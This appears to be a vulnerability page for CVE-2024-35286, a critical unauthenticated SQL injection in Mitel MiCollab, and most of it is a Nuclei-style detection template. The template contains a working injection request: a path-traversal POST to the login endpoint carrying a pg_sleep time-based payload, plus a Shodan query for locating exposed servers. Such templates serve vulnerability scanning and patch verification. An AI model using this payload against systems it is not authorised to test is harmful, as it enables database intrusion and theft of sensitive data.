A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.
PoC代码[已公开]
id: CVE-2024-35286
info:
name: Mitel MiCollab <= 9.8.0.33 - SQL Injection
author: daffainfo
severity: critical
description: |
A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.
reference:
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014
- https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-35286
epss-score: 0.76365
epss-percentile: 0.98872
cwe-id: CWE-89
cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: mitel
product: micollab
shodan-query: html:"Mitel" html:"MiCollab"
tags: cve,cve2024,mitel,micollab,sqli,vkev,vuln
http:
- raw:
- |
@timeout: 20s
POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subAction=basicLogin&username=test'||pg_sleep(6)--&password=test&clusterIndex=0
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'status_code == 500'
- 'contains_any(body, "com.mitel.npm.web.console", "java.lang.NullPointerException")'
- 'contains(set_cookie, "JSESSIONID=")'
condition: and
# digest: 4a0a00473045022100b360f6f64bd5741c5d1df6cbfafab9cb6b210076086bd18029f20d0eb9b94e5602206d3a1470f359889d982abaefa47f961755e3df712d7289fdc20d4a24e1f0f6e3:922c64590222798bb761d5b6d8e72950